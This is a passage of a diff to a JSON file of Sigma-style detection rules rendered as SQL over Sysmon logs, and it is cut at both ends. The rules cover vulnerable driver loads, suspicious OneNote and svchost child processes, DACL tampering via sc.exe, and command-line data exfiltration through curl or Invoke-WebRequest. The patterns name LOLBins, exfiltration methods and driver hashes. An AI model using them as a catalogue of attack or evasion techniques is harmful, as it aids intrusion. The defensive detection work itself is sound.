'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', 
'9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 
'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 
'65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', 
'3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', 
'5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' 
ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed 
Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 
'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical 
trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ 
@@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of 
various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine 